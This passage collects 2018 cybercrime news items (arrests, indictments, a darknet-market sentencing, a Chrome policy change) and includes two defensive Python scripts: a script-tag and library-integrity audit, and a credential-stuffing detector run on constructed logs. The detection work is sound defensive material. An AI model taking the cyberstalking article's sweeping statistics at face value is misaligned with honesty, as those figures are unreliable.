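BASELINE = {"modernizr.js": sha256_hex(PRISTINE_MODERNIZR)}

if __name__ == "__main__":
    for finding in audit_script_tags(SAMPLE_HTML, "shop.example.com"):
        print(finding)
    print(check_bundle_integrity("modernizr.js", TAMPERED_MODERNIZR, BASELINE))
```

The baseline hashes need to be captured at build or deploy time and stored outside the web root; a baseline the attacker can rewrite along with the library is worthless. Running the audit on a schedule against the live page, rather than the repository, is what catches a modification made directly on the web server.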

Police arrested Apophis Squad member responsible for ProtonMail DDoS attack
8.9.2018 securityaffairs Crime

The UK NCA arrested a member of the Apophis Squad hacker group, which launched distributed denial-of-service (DDoS) attacks against many organizations, including ProtonMail.
The U.K. National Crime Agency (NCA) announced the arrest of 19-year-old George Duke-Cohan from Hertfordshire, who was involved in the ProtonMail DDoS attack.

The teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,” was arrested on August 31 and remains in custody after he pleaded guilty to three counts of making hoax bomb threats.

According to investigators, the young man is the leader of the Apophis Squad, the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against the encrypted email provider ProtonMail, the investigative journalist Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team also offered a DDoS-for-hire service with many similarities to the booter run by the Lizard Squad hacking crew.

“Yesterday at Luton Magistrates Court, George Duke-Cohan, 19, pleaded guilty to three counts of making hoax bomb threats following an investigation by the National Crime Agency.
Duke-Cohan sent the bomb threats that resulted in over 400 schools in the UK being evacuated in March 2018 for which he was arrested just days later.” reads the announcement published by the NCA.

“In April whilst under investigation, he sent a mass email to schools in the UK and the US claiming that pipe bombs had been planted on the premises.”

He has admitted making bomb threats to thousands of schools and a United Airlines flight travelling from the UK to San Francisco in August.

The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

ProtonMail was hit by a massive DDoS attack in June that caused some delays to the company's operations; the attack was mitigated with the help of the security firm Radware.


ProtonMail founder Andy Yen confirmed that his company helped law enforcement identify Duke-Cohan and other members of the group, who were all, ironically, using the ProtonMail service.

Brian Krebs also provided valuable information that helped the NCA identify the teenager in early August.

“What we found, combined with intelligence provided by renowned cyber security journalist Brian Krebs, allowed us to conclusively identify Duke-Cohan as a member of Apophis Squad in the first week of August, and we promptly informed law enforcement,” Protonmail wrote in a blog post.

“British police did not move to immediately arrest Duke-Cohan however, and we believe there were good reasons for that. Unfortunately, this meant that through much of August, ProtonMail remained under attack, but due to the efforts of Radware, ProtonMail users saw no impact.”

ProtonMail's CEO believes further charges are pending, along with possible extradition to the US.

ProtonMail highlighted that it is committed to protecting the privacy of its users, but it will not accept its service being abused by cybercriminals.

“That’s why we will investigate to the fullest extent possible anyone who attacks ProtonMail or uses our platform for crime. We will also cooperate with law enforcement agencies within the framework of Swiss law,” warned ProtonMail.

“In recent weeks, we have further identified a number of other individuals engaged in attacks against ProtonMail, and we are working with the appropriate authorities to bring them to justice.”

U.K. Teen Involved in ProtonMail DDoS Attack Arrested
8.9.2018 securityweek Crime

ProtonMail has helped law enforcement identify one of the members of the Apophis Squad, a group that has made bomb threats and launched distributed denial-of-service (DDoS) attacks against many organizations.

The U.K. National Crime Agency (NCA) announced this week that a 19-year-old from Hertfordshire was arrested on August 31. The teen, George Duke-Cohan, remains in custody after he pleaded guilty to three counts of making hoax bomb threats.

Duke-Cohan is said to be the leader of Apophis Squad, which has sent bomb threats to thousands of schools in the United Kingdom and the United States. The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

While the charges in the U.K. focus on the hoax bomb threats, Apophis Squad is also known for launching DDoS attacks against encrypted email provider ProtonMail, cybersecurity journalist Brian Krebs, the DEF CON hacking conference, and government agencies in several countries. Its attacks and DDoS-for-hire services have apparently been inspired by the notorious Lizard Squad, whose members were also identified and charged by authorities.

ProtonMail reported in late June that it had been hit by a significant DDoS attack that caused some delays in the delivery of emails. The organization initially said a group linked to Russia had been behind the attack – Apophis Squad’s Twitter account claims the group is from Russia – but Radware, which helped ProtonMail mitigate the attack, later clarified that the attackers were actually based in the U.K.

In a blog post published on Thursday, ProtonMail Founder Andy Yen revealed that his organization helped authorities identify Duke-Cohan and other members of his group after learning that they had all been using ProtonMail.

It turns out that while Duke-Cohan and others claimed law enforcement would never be able to find them, they actually had poor operational security (opsec) practices and they even allowed their own servers to be breached.

Evidence collected from its own systems by ProtonMail and information from Brian Krebs helped identify Duke-Cohan as a member of Apophis Squad in the first week of August. However, British police only arrested him in late August after he threatened to make more bomb threats once school started in September.

The Twitter account used by Apophis Squad has not been active since August 31.

“We believe further charges are pending, along with possible extradition to the US,” Yen said.

ProtonMail aims to protect the privacy of its users, but warned that it does not protect individuals involved in criminal activities.

“That’s why we will investigate to the fullest extent possible anyone who attacks ProtonMail or uses our platform for crime. We will also cooperate with law enforcement agencies within the framework of Swiss law,” Yen said. “In recent weeks, we have further identified a number of other individuals engaged in attacks against ProtonMail, and we are working with the appropriate authorities to bring them to justice.”

The Rise of an Overlooked Crime – Cyberstalking
29.8.2018 securityaffairs Crime

Cyberstalking is one of the most overlooked crimes. This is exactly why it is among the fastest growing crimes in the world. Learn all there is about cyberstalking here.
The internet has been a blessing since its inception. The very concept of globalization has come into existence just because of the internet. The world that was previously unconnected soon became a global village with different cultures and traditions linking together via the information highway.

The internet brought with it plenty of benefits, but accompanying these benefits came some evils that were previously not known of. These evils include hacking, identity theft, online surveillance, and cyberstalking.

We all know the dangers associated with hacking, identity theft, and internet surveillance, thanks to Facebook and other social networking platforms. What we’re probably not aware of is cyberstalking, which is the most disgusting and dangerous of all these threats.

The Dangers of Cyberstalking
Most of us are already aware of what cyberstalking is or have encountered real-world stalking at some point in our lives. Women tend to have experienced it more often than men. Stalking in its traditional sense refers to a situation where someone is keeping an eye on you against your will or interest. While this alone is enough to make someone uncomfortable, stalkers do it to learn more about their victim so that they can use that information to blackmail their victims or take advantage of them.

Cyberstalking is not too different, except that it’s more efficient than the traditional one. Because of the internet and all of its connectivity, stalkers do not need to follow you around the neighborhood. If you’re not too careful, they can learn everything there is to know about you, without even leaving their dimly lit basements.

They do this by following you on the internet. Because of social media, it’s not too difficult to follow you around. You probably post most of your daily activities on your social media profile. You check into places, post pictures while you’re there, tell people about the movie you recently watched, and share your current mood and feelings.

Why do people get targeted so easily?
All the personal information that is nowadays easily available on the internet can become a source of pleasure for any random cyberstalker, who can learn all there is to know about anyone in just a few clicks.

Most cyberstalkers are skilled hackers as well. They can hack into your social profiles and read your chats, and even post material from your profiles that can damage your reputation. Once an account has been compromised, finding pictures in chats, such as those that may have been shared with an intimate friend, is a cakewalk.

Similarly, these hackers can hack your devices too. This means that any private data saved on your phone can be seen and taken over by the hacker. They can even hack into your webcam and watch you live, without you knowing about it.

Today, modern technology has made it much easier for hackers and other cybercriminals to hide their tracks. With a specialized cyber security tool such as a VPN, anyone can become completely anonymous and invisible online, making it impossible for anyone to detect your presence or activities.

There are many other cybersecurity services that hackers and cyber criminals use for their unfair advantage. These include proxies and remote servers that allow hackers to keep bouncing their traffic on to different servers, thereby keeping them safe from getting detected.

While cyberstalking is an issue for all genders, women are the most affected. When cyber stalkers get their desired info, they use it to blackmail the victim and force them to do special favors. Some demand money, others demand more heinous things. And there’s no end to all this blackmailing. Those who are affected even turn towards suicide just to bring an end to all this creepiness and blackmailing.

According to some recent estimations, 94% of women who use the internet have faced cyberstalking at some point in their life. Moreover, 62% of all cyberstalking victims are young women between the age of 18 and 24.

Over 20,000 cyberstalking cases get reported each year and this number keeps growing every next year. We also know that there may be an equal number of cases which never get reported due to the taboos and stigmas attached with being a victim of cyber stalking. What’s worse is that cyberstalking has been on the rise for many years. Psychologytoday.com says that, cyberstalking is the fastest growing crime and at least 1 million women are cyber-stalked in the US alone. According to a report by WHOA, 60% of all cyberstalking victims are women while 40% are teenage boys and adult males.

The following are a few examples of cyberstalkers who like to prey on the innocents:

Intimate partner stalkers
These are people who refuse to accept that their relationship no longer exists. Intimate partner stalkers are emotionally abusive and want to control their partner despite the breakup. They continue to keep a constant eye on their former partner and make them feel extremely uncomfortable, violated, and scared.

Delusional stalkers
These are people who may suffer from major mental illnesses such as schizophrenia, manic-depression, or erotomania. They believe that the victim is in love with him/her and that they are in a relationship even though the victim has no clue about this imaginary relationship. Other delusional stalkers believe that if they pursue the person long enough, the victim would eventually give up and fall in love.

Vengeful stalkers
These people are motivated by vengeance. Vengeful stalkers have a cause to be angry with their victims. Vengeful stalkers are often targeted by members of their university or college faculty/staff. Some of these are psychopaths, while others are delusional and believe that they are the victims even though they’re not. Vengeful stalkers stalk to get even.

The Lack of Awareness…
What's worse about cyberstalking is that there is virtually no awareness of it. Those affected by this issue do not know how to deal with it, because most victims prefer to stay quiet to protect their name and reputation. Others can't even find the right platforms to raise their voice and get the right kind of help.

However, there are businesses and organizations that are standing up against cyberstalking and are using their resources and their knowledge to help the victims. Cyberstalking is a menace but it can be dealt with if proper precautions are followed. You can follow some important precautions mentioned here and stay safe from cyberstalking.

Darknet Market Spokesman Gets Nearly 4 Years in Prison
2.8.2018 securityweek Crime

ATLANTA (AP) — A man who promoted an international criminal online marketplace and assisted people using it for illicit transactions was sentenced Tuesday in Atlanta to serve nearly four years in federal prison.

Ronald L. Wheeler III of Streamwood, Illinois, worked for about two years as a public relations specialist for AlphaBay, which authorities have said was the world's leading "darknet" marketplace when an international law enforcement effort shut it down in July 2017.

Wheeler pleaded guilty in March to a charge of conspiracy to commit access device fraud. Prosecutors said he worked with others to steal personal information — including passwords, email addresses and bank account numbers — to obtain money, goods and services.

U.S. District Judge Leigh May sentenced Wheeler, 25, to spend three years and 10 months in prison, followed by three years of supervised release. As part of a plea deal reached with prosecutors, Wheeler also agreed to forfeit $27,562 in cash found in his home and 13.97 bitcoins, which are currently worth a total of more than $100,000.

Wheeler apologized to the judge and told her he has worked hard since he was caught to get himself on the right path — getting a legitimate job, paying taxes and kicking a drug addiction.

"As I move forward, I hope to be able to do right by this country and the world," he said.

May said Wheeler's crime was extremely serious, but she imposed the relatively light sentence agreed to by the two sides in part because of the effort he'd made.

"You're doing what you need to do to show me you've learned from this," she said.

Known online as Trappy and Trappy_Pandora, Wheeler began working for AlphaBay in May 2015. His duties included moderating the AlphaBay forum on Reddit and posting information about AlphaBay in other Reddit forums, mediating sales disputes among the marketplace's users, providing nontechnical assistance to users and promoting AlphaBay online, prosecutors have said.

Wheeler's lawyer, Phillip Turner, described his client as a "very misguided young man who came from a situation where he lacked self-esteem and got on the wrong path." Having a title bestowed upon him by AlphaBay made him feel important and gave him a sense of belonging, Turner said in court.

Prosecutor Samir Kaushal told the judge Wheeler was completely aware he was involved in illegal activity and encouraged lawlessness in others. Given the scope of the illegal activity enabled by AlphaBay — including the sale of personal financial information and dangerous drugs — Wheeler could have been charged with much more serious crimes that would have carried a much heftier sentence.

"This is a very good outcome for him," Kaushal said.

The only reason prosecutors recommended a lower sentence is because when he was caught, he immediately admitted his guilt and began cooperating with the government, Kaushal said.

Wheeler was paid a salary in bitcoin, a digital currency, by Alexandre Cazes, the 25-year-old Canadian owner of AlphaBay who was known online as Alpha02 and Admin, according to a court filing.

AlphaBay used Tor, a network of thousands of computers run by volunteers, to hide its tracks. With Tor, traffic gets relayed through multiple computers, with identifying information stripped at each stop so no single computer knows the full chain.

The court filing says Wheeler's work with AlphaBay ended July 3, 2017. Two days later, Cazes was arrested in Thailand with DEA and FBI assistance, resulting in AlphaBay going offline. Cazes died in Thai police custody on July 12, 2017. The country's narcotics police chief told reporters at the time that Cazes hanged himself in jail just before a scheduled court hearing.

The police agency Europol estimates AlphaBay had done $1 billion in business since its 2014 creation. Cazes had amassed a $23 million fortune as the site's creator and administrator, according to court records.

Three Ukrainians Arrested for Hacking Over 100 US Companies
2.8.2018 securityweek Crime

Three Ukrainians have been arrested for hacking more than 100 US companies and stealing millions of customer records, the Department of Justice announced Wednesday.

Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kolpakov, 30, were members of a "sophisticated international cybercrime group" called "FIN7," the department said in a statement.

"Since at least 2015, FIN7 members engaged in a highly sophisticated malware campaign targeting more than 100 US companies, predominantly in the restaurant, gaming, and hospitality industries," it said.

"FIN7 hacked into thousands of computer systems and stole millions of customer credit and debit card numbers, which the group used or sold for profit," it said.

The Justice Department said members of the "prolific hacking group" also targeted computer networks in Britain, Australia, and France.

FBI special agent Jay Tabb told a press conference in Seattle, Washington, where the arrests were announced, that the hacking was not state-sponsored.

"No linkage at all to any state-sponsored activity," Tabb said. "This is just old-fashioned organized crime."

Fedorov, a "high-level hacker and manager," was arrested in Bielsko-Biala, Poland, in January and is being detained pending extradition to the United States, the Department of Justice said.

Hladyr, FIN7's systems administrator, was arrested in Dresden, Germany, in January, it said, and is being held in Seattle, Washington, pending a trial scheduled to open on October 22.

Kolpakov, described as a "supervisor of a group of hackers," was arrested in Lepe, Spain, in late June and is being detained there pending a US extradition request, the department said.

- Chipotle, Arby's targeted -

"Cyber criminals who believe that they can hide in faraway countries and operate from behind keyboards without getting caught are just plain wrong," said Annette Hayes, US Attorney for the Western District of Washington.

The charges against the three were contained in federal indictments unsealed on Wednesday.

They were charged with 26 counts of conspiracy, wire fraud, computer hacking, access device fraud, and aggravated identity theft.

The Justice Department said that FIN7 also known as the "Carbanak Group" and the "Navigator Group," breached computer networks of companies in 47 US states and Washington DC.

They allegedly stole "more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations."

Among the companies which have publicly disclosed hacks by FIN7 are Chipotle Mexican Grill, Chili's, Arby's, Red Robin and Jason's Deli, the Justice Department said.

Many of the businesses were targeted through phishing schemes involving email.

"FIN7 carefully crafted email messages that would appear legitimate to a business' employee, and accompanied emails with telephone calls intended to further legitimize the email," it said.

Once an attached file was opened, it would trigger malware to steal payment card data which was sold on online underground marketplaces.

Two Arrested for Hacking 700,000 Accounts
2.7.2018 securityweek  Crime

Russian law enforcement this week said two individuals were arrested for compromising accounts of loyalty program members from popular websites.

The unnamed cybercriminals allegedly compromised around 700,000 accounts from companies such as PayPal, Ulmart, Biglion, KupiKupon, Groupon, and others. They are also said to have put 2,000 of these accounts up for sale for $5 each.

“The detainees admitted on the spot that they had earned at least 500,000 rubles. However, the real amount of damage remains to be determined,” Group-IB, which aided with the investigation, says.

The hackers' activity first drew attention in November 2015, after the website of a large online store was hit by a large-scale cyber-attack in which the personal accounts of the store's loyalty program members were compromised. Miscreants compromised around 120,000 accounts within a month.

The investigators discovered that the attackers “had collected compromised account information from various Internet services on hacker forums and used special programs to automatically guess passwords of accounts on the website of the online store.”

The miscreants relied on people’s habit of reusing the same login/password on multiple websites. If the logins and passwords were used on the targeted websites, the hackers would access those personal accounts.

The cybercriminals would check the accumulated bonuses on each account and would sell them on hacker forums at $5 per account or 20-30% of the nominal balance of the accounts. The buyers could then abuse the accounts to pay for products with the bonuses.

The hackers, Group-IB says, weren’t only selling compromised accounts, but also offered services for hijacking accounts: they would change the phone number and e-mail on the accounts of the online store. Such services were offered at a price of 10% of the bonus balance on the account.

To hide their tracks, the attackers used anonymizers, launched the attacks from different IP addresses, and also rotated the browser’s digital fingerprint (the User-Agent string). Overall, they sent authorization requests from more than 35,000 unique IP addresses.
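The credential-stuffing pattern described above, as an added defensive example that is not part of Group-IB’s report: a small detector run over constructed auth-log lines (the log format, account names, addresses and thresholds are all assumptions), showing why a per-IP rule misses a campaign spread over many addresses while per-account and whole-window signals still catch it.

```python
import re
from collections import defaultdict

# Constructed auth-log line format (an assumption, not any retailer's real logs):
#   <timestamp> ip=<addr> user=<name> result=OK|FAIL ua="<user agent>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) '
    r'result=(?P<result>OK|FAIL) ua="(?P<ua>[^"]*)"$'
)

# Constructed quiet period: a few regular customers, one mistyped password.
BASELINE_LOG = """
2015-11-02T09:00:00Z ip=198.51.100.10 user=alice result=OK ua="UA-A"
2015-11-02T09:05:00Z ip=198.51.100.10 user=alice result=OK ua="UA-A"
2015-11-02T09:10:00Z ip=198.51.100.11 user=bob result=FAIL ua="UA-B"
2015-11-02T09:10:30Z ip=198.51.100.11 user=bob result=OK ua="UA-B"
2015-11-02T09:20:00Z ip=198.51.100.12 user=carol result=OK ua="UA-C"
2015-11-02T09:30:00Z ip=198.51.100.13 user=dave result=OK ua="UA-D"
"""

# Constructed stuffing burst: leaked credentials replayed from a fresh IP and a
# fresh User-Agent on every attempt; a couple of reused passwords actually work.
ATTACK_LOG = """
2015-11-03T02:00:00Z ip=203.0.113.1 user=alice result=FAIL ua="UA-X1"
2015-11-03T02:00:01Z ip=203.0.113.2 user=bob result=FAIL ua="UA-X2"
2015-11-03T02:00:02Z ip=203.0.113.3 user=carol result=OK ua="UA-X3"
2015-11-03T02:00:03Z ip=203.0.113.4 user=bob result=FAIL ua="UA-X4"
2015-11-03T02:00:04Z ip=203.0.113.5 user=dave result=FAIL ua="UA-X5"
2015-11-03T02:00:05Z ip=203.0.113.6 user=bob result=FAIL ua="UA-X6"
2015-11-03T02:00:06Z ip=203.0.113.7 user=erin result=FAIL ua="UA-X7"
2015-11-03T02:00:07Z ip=203.0.113.8 user=bob result=OK ua="UA-X8"
"""

def parse_auth_log(text):
    """Parse the constructed format into dicts; malformed lines raise instead of vanishing."""
    events = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: unrecognised auth log line")
        events.append(m.groupdict())
    return events

def window_stats(events):
    """Aggregate one window: which accounts each IP tried, which IPs hit each account, failure rate."""
    per_ip_users = defaultdict(set)
    per_user_ips = defaultdict(set)
    fails = 0
    for e in events:
        per_ip_users[e["ip"]].add(e["user"])
        per_user_ips[e["user"]].add(e["ip"])
        fails += e["result"] == "FAIL"
    n = len(events)
    return {
        "attempts": n,
        "fail_ratio": fails / n if n else 0.0,
        "ip_spread": len(per_ip_users) / n if n else 0.0,  # distinct IPs per attempt
        "per_ip_users": per_ip_users,
        "per_user_ips": per_user_ips,
    }

def detect_credential_stuffing(baseline_events, window_events, max_users_per_ip=5,
                               max_ips_per_user=3, fail_ratio_mult=3.0, min_attempts=8):
    """Compare a window against a quiet baseline; thresholds are illustrative assumptions."""
    base = window_stats(baseline_events)
    cur = window_stats(window_events)
    signals = []
    # Classic per-IP rule: one address guessing many accounts. A campaign spread
    # over tens of thousands of IPs (one or two guesses each) never trips it.
    per_ip_flagged = sorted(ip for ip, users in cur["per_ip_users"].items()
                            if len(users) > max_users_per_ip)
    if per_ip_flagged:
        signals.append("noisy_ip")
    # Per-account rule: the same account probed from many addresses in one window.
    per_user_flagged = sorted(user for user, ips in cur["per_user_ips"].items()
                              if len(ips) > max_ips_per_user)
    if per_user_flagged:
        signals.append("account_from_many_ips")
    # Whole-window rules: replayed leaked credentials mostly fail, and the IP
    # rotation itself shows up as nearly one distinct address per attempt.
    if cur["attempts"] >= min_attempts:
        if cur["fail_ratio"] >= fail_ratio_mult * max(base["fail_ratio"], 0.05):
            signals.append("global_fail_ratio")
        if cur["ip_spread"] >= 0.9:
            signals.append("one_ip_per_attempt")
    return {"signals": signals, "per_ip_flagged": per_ip_flagged,
            "per_user_flagged": per_user_flagged,
            "fail_ratio": cur["fail_ratio"], "ip_spread": cur["ip_spread"]}
```

On the constructed burst the per-IP rule stays silent while the per-account and whole-window rules fire; on the baseline replayed against itself nothing fires.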

Large retailers started checking all orders paid with bonuses in early 2016, which prompted the hackers to shift to lesser-known online stores.

“In addition, the hackers began to work on tips—information about new online stores with bonus programs and coupon services where it was possible to access personal accounts, for which the attackers promised to pay up to 50% of the amount received from the further sale of the compromised accounts,” Group-IB reports.

The leader in these attacks was a resident of Ryazan Region, born in 1998. His partner, born in 1997, who provided technical support for their joint online store, resided in Astrakhan Region.

During a search, investigators seized evidence of the group’s unlawful activities, along with narcotics. The suspects have confessed to the crimes but the investigation is still ongoing.

Eight Arrested for Roles in Email Fraud Schemes
26.6.2018 securityweek  Crime

Eight individuals were arrested for their roles in a widespread, Africa-based business email compromise (BEC) conspiracy, the United States Department of Justice announced on Monday.

Following Operation WireWire earlier this month, the new international effort, named "Operation Keyboard Warrior", resulted in five individuals being arrested in the United States, along with three others in Ghana. Four more were indicted for their roles in the CEO schemes, but remain at large.

BEC is a type of fraud that targets employees in decision-making positions within organizations via email, phone, or fax, to hijack wire transfers or trick them into authorizing payments for fake invoices.

Tens of thousands have fallen victim to BEC schemes, with losses amounting to billions of dollars. Victims include accounts payable personnel at Fortune 500 companies, global maritime shipping companies and their customers, and more.

As part of Operation Keyboard Warrior, DoJ coordinated with international law enforcement to disrupt online frauds perpetrated from Africa. The fraud scheme, which had been running since at least 2012, allegedly defrauded U.S. companies and citizens of around $15 million, the Justice Department says.

The individuals arrested in the U.S. are Javier Luis Ramos Alonso, 28, a Mexican citizen residing in Seaside, California; James Dean, 65, of Plainfield, Indiana; Dana Brady, 61, of Auburn, Washington; Rashid Abdulai, 24, a Ghanaian citizen residing in the Bronx, New York, and Olufolajimi Abegunde, 31, a Nigerian citizen residing in Atlanta, Georgia.

Maxwell Atugba Abayeta aka Maxwell Peter, 26, and Babatunde Martins, 62, of Ghana and Benard Emurhowhoariogho Okorhi, 39, a Nigerian citizen who resides in Ghana, were arrested overseas and await their extradition. Sumaila Hardi Wumpini, 29; Dennis Miah, 34; Ayodeji Olumide Ojo, 35, and Victor Daniel Fortune Okorhi, 35, who were also charged in the indictment, remain at large.

The defendants are charged with conspiracy to commit wire fraud, wire fraud, conspiracy to commit money laundering, conspiracy to commit computer fraud, and aggravated identity fraud.

According to the indictment, the Africa-based coconspirators committed, or caused to be committed, intrusions into the servers and email systems of a Memphis-based real estate company in June and July 2016.

The defendants used spoofed email addresses and Virtual Private Networks to identify large financial transactions, engage in fraudulent email correspondence with the relevant business parties, and redirect closing funds, through a network of U.S.-based money mules, to Africa. The scheme defrauded companies and individuals in Memphis of hundreds of thousands of dollars.

According to the indictment, some of the Africa-based defendants also engaged in various romance scams, fraudulent-check scams, gold-buying scams, advance-fee scams, and credit card scams. All the proceeds of these criminal activities were shipped and/or transferred from the United States to locations in Ghana, Nigeria, and South Africa.

Some of the defendants are also said to have been concealing their conduct by, among other means, “stealing or fraudulently obtaining personal identification information (PII) and using that information to create fake online profiles and personas,” the DoJ announcement reads.

“The defendants allegedly unleashed a barrage of international fraud schemes that targeted U.S. businesses and individuals, robbing them to the tune of approximately $15 million,” Acting Assistant Attorney General John P. Cronan of the Justice Department’s Criminal Division said.

Massachusetts Man Pleads Guilty to ATM Hacking
21.6.2018 securityweek  Crime

A Massachusetts man pleaded guilty to his role in an ATM “jackpotting” operation, the United States Department of Justice announced this week.

ATM jackpotting is a type of attack where individuals who have physical access to an automated teller machine connect to it and then use malware or specialized electronic equipment (or both) to gain control of the system’s operations.

Long observed in Europe and Asia, ATM jackpotting only arrived in the United States in late 2017. In January 2018, the US Secret Service issued a warning to alert law enforcement and financial institutions on jackpotting attacks. Incidents were observed in Connecticut and elsewhere.

In early February, the DoJ announced that Alberto Fajin-Diaz, 31, a citizen of Spain, and Argenys Rodriguez, 21, of Springfield, Massachusetts, had been charged over ATM jackpotting. The two were arrested on January 27 after being found near an ATM that had been compromised with jackpotting malware and was dispensing $20 bills.

On Monday, John H. Durham, United States Attorney for the District of Connecticut, announced that Rodriguez pleaded guilty to his role in the ATM jackpotting scheme.

After being alerted by Citizens Bank investigators of a possible jackpotting attack on an ATM in Cromwell, the police encountered Rodriguez and Fajin-Diaz in the vicinity of an “ATM that had been compromised with malware and was in the process of dispensing $20 bills,” the DoJ says.

In the duo’s vehicle, the police found tools and electronic devices that could be used to compromise ATMs to dispense cash. The two men also had around $5,600 in cash, yet the investigation revealed that over $63,000 had been taken from the ATM on that date.

The investigators later discovered that, on January 22, 2018, Rodriguez, Fajin-Diaz and others illegally obtained $63,820 from a Citizens Bank ATM in Rhode Island.

Rodriguez is scheduled to be sentenced on September 26, 2018. He faces a maximum term of imprisonment of 30 years. Fajin-Diaz pleaded guilty to his role in the ATM jackpotting attacks on June 12, 2018, and awaits sentencing.

Google Removes Inline Installation of Chrome Extensions
13.6.2018 securityweek Crime

Google this week detailed plans to completely remove the inline installation of Chrome extensions from its web browser by the end of the year.

Introduced in 2011, inline installation was meant to make it easier for users to add extensions to the browser by installing them directly from the developer’s website instead of having to go to the Chrome Web Store.

Starting this Tuesday, June 12, inline installation is no longer available for newly published extensions. This fall, however, the change will also affect existing extensions, Google says.

“Extensions first published on June 12, 2018 or later that attempt to call the chrome.webstore.install() function will automatically redirect the user to the Chrome Web Store in a new tab to complete the installation,” James Wagner, Extensions Platform Product Manager at Google, explains.

The next stage will enter into effect on September 12, 2018. Starting that day, inline installation will be disabled for existing extensions, meaning that all users will be automatically redirected to the Chrome Web Store in order to complete installations.

The final nail in the coffin, however, will come in early December 2018, when Chrome 71 arrives. That browser release, the search company says, will be stripped of the inline install API method.

“Later this summer, inline installation will be retired on all platforms. Going forward, users will only be able to install extensions from within the Chrome Web Store, where they can view all information about an extension’s functionality prior to installing,” Wagner revealed.

According to Google, the removal of inline installation of extensions would add more transparency for Chrome users. Many of these users, the company claims, complain about unwanted extensions on their browser, with most of the complaints referring to “confusing or deceptive uses of inline installation on websites.”

To eliminate the issue, the search provider says, users will be redirected to the Chrome Web Store instead, where detailed information on what’s being installed is available. Thus, users will “fully understand how their browsing experience will be impacted.”

Developers with extensions that use inline installation need to update the install buttons on their website to link to the extension’s Chrome Web Store page prior to the stable release of Chrome 71.

Several years ago, Google disabled inline installation for developers who used deceptive tactics to trick users into installing their extensions.

Over the past several years, millions of Chrome users were impacted by malicious extensions published to the Chrome Web Store. Some of these applications could lead to the injection and execution of arbitrary JavaScript code, while others were hijacked to display potentially malicious ads and steal user credentials.

74 Arrested in International Operation Targeting BEC Scams
12.6.2018 securityweek Crime

A total of 74 individuals have been arrested as part of an international law enforcement operation targeting business email compromise (BEC) scams, U.S. authorities announced on Monday.

Forty-two people have been arrested in the United States, 29 in Nigeria, and three in Canada, Mauritius, and Poland. The operation, dubbed “Wire Wire” and conducted over a period of six months, also resulted in the seizure of nearly $2.4 million and the disruption and recovery of roughly $14 million in fraudulent wire transfers, according to the Department of Justice and the FBI.

Some of the suspects are believed to have been involved in schemes targeting businesses of all sizes, while others targeted individual victims.

The Justice Department said 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. The list of suspects also includes two Nigerian nationals living in Dallas, Texas, who tricked a real estate closing attorney into wiring $246,000 to accounts they controlled.

A separate indictment targets three individuals, two of whom were extradited to the United States from the United Kingdom and Mauritius.

BEC scams, which authorities also call cyber-enabled financial fraud, often target employees with access to company finances and trick them into making wire transfers to bank accounts controlled by the criminals. The FBI has received reports of losses totaling more than $3.7 billion since the agency’s Internet Crime Complaint Center (IC3) began keeping track of BEC scams.

“The federal law enforcement agencies that executed on this takedown deserve our gratitude,” said Christy Wyatt, CEO of Dtex Systems, a security provider that helps organizations defend their most trusted insiders. “Removing 42 criminals off of our cyber streets will hopefully make things safer, serve as warning to others and provide us with details that will help us to be more secure moving forward. The operation is also a reminder that most major cybercrimes involve employee error and under-utilization of technology and education resources that can be used to defend our most trusted insiders.”

Marcus Hutchins, WannaCry-killer, hit with four new charges by the FBI
8.6.2018 thehackernews  Crime

Marcus Hutchins, the British malware analyst who helped stop the global WannaCry menace, is now facing four new charges related to malware he allegedly created and promoted online to steal financial information.
Hutchins, the 24-year-old better known as MalwareTech, was arrested by the FBI last year as he was headed home to England from the DefCon conference in Las Vegas for his alleged role in creating and distributing Kronos between 2014 and 2015.
Kronos is a Banking Trojan designed to steal banking credentials and personal information from victims' computers, which was sold for $7,000 on Russian online forums, and the FBI accused Hutchins of writing and promoting it online, including via YouTube.

Hutchins pleaded not guilty at a court hearing in August 2017 in Milwaukee and was released on $30,000 bail.
However, earlier this week, a revised superseding indictment [PDF] was filed with the Wisconsin Eastern District Court, under which Hutchins faces four new charges along with the six prior counts filed against him by the FBI a month before his arrest.
Marcus Accused of Creating and Selling Another Malware
According to the new indictment, Hutchins created a second piece of malware, known as "UPAS Kit," and also lied to the Federal Bureau of Investigations (FBI) when he was arrested and questioned last year in Las Vegas.
As described by prosecutors, UPAS Kit is a Spybot virus that "allowed for the unauthorized exfiltration of information from protected computers" and "used a form grabber and web injects to intercept and collect personal information," including credit card details.
UPAS Kit was advertised as able to "install silently and not alert antivirus engines," at prices above $1,000 back in 2012.
According to the indictment, Hutchins created UPAS Kit in 2012, when he was just 18, and sold it online to another unnamed co-defendant identified as "VinnyK" (aka Aurora123), who was also involved in promoting Kronos.

VinnyK then sold UPAS Kit to another person in Wisconsin in 2012, who allegedly used the malware to attack computers in the United States.
Two other charges relate to Hutchins "aiding and abetting" the distribution of invasive code in an attempt to damage "10 or more protected computers," and helping others to hack computers for financial gain.
Marcus Appealed to his Followers for Donations to Cover Legal Costs
As the news on the revised indictment broke, Hutchins, who has repeatedly denied any illegal activity, called the charges "bullshit" and appealed to his Twitter followers for donations to cover legal costs.
"Spend months and $100k+ fighting this case, then they go and reset the clock by adding even more bullshit charges like 'lying to the FBI,'" Hutchins wrote on his Twitter, calling for donations by adding a quote from Starcraft video game: "We require more minerals."
Hutchins' lawyer Brian Klein called the charges "meritless" and said he expects his client to be cleared of all charges.
